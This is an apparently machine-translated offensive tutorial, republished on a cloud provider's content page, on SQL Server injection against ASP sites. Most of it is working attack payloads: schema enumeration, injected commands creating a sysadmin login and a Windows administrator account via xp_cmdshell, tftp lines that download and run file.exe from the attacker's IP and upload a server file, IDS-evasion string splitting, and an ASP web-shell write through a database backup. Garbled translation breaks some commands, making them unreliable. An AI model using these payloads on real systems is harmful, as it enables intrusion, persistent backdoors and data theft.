Advanced SQL Server INJECTION SKILLS of Guilin veterans

Source: Internet
Author: User
Tags sql server injection

Now, the veteran's years of SQL Server injection advanced skills are presented to friends who support veterans:


Preface:
Other basic injection methods are not described in detail.
You cannot understand the basic injection articles on this site.
For better use of injection, we suggest you read the SQL syntax articles on this site.


[Retrieve all database names]
Select name from master. dbo. sysdatabases where dbid = 7 // The value of dbid is more than 7.


[Retrieve data table name] [update the field value to the table name, and read the value of this field to get the table name]
Select top 1 name from database name. dbo. sysobjects where xtype = u and status> 0 and name not in (table)


[Obtain the field name of a data table] [update the field value to the field name, and then read the value of this field to obtain the field name]
Select top 1 Database Name. dbo. col_name (object_id (name of the data table to be queried), field columns such as: 1) [where condition]


Create a database administrator account and a system administrator account through SQLSERVER injection vulnerability [the current account must be a SYSADMIN Group]


News. asp? Id = 2; exec master. dbo. sp_addlogin test, test; -- // Add the database user test with the password test
News. asp? Id = 2; exec master. dbo. sp_password test, 123456, test; -- // if you want to change the password, use this sentence (change the password of test to 123456)
News. asp? Id = 2; exec master. dbo. sp_addsrvrolemember test, sysadmin; -- // Add test to the sysadmin group. Members of this group can perform any operation
News. asp? Id = 2; exec master. dbo. xp_mongoshell net user test/add; -- // add the System user test with the password test
News. asp? Id = 2; exec master. dbo. xp_mongoshell net localgroup administrators test/add; -- // upgrade system user test to administrator


In this way, you have left the test administrator account in both the database and system.


The following figure shows how to run file.exe after your server downloads the file [prerequisite: You must set your computer as a TFTP server and open port 69]


Id = 2; exec master. dbo. xp_cmdshell tftp-I your IP get file.exe ;--


Then run the file:
Id = 2; exec master. dbo. xp_cmdshell file.exe ;--


Download the file2.doc file of the server to the local TFTP server [the file must exist]:


Id = 2; exec master. dbo. xp_cmdshell tftp-I your IP Put file2.doc ;--


Bypassing IDS detection [using variables]
Declare @ a sysname set @ a = xp _ + export shell exec @ a dir c:
Declare @ a sysname set @ a = xp + _ cm + dshell exec @ a dir c:


Newly Added:

Create a table. There is only one field in the format of image, which writes asp content. Export the database as a file
Backup database dbname to disk = d: webdb. asp;


An error is reported to get the system OS and database system version number.
Id = 2 and 1 <> (select @ VERSION );

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.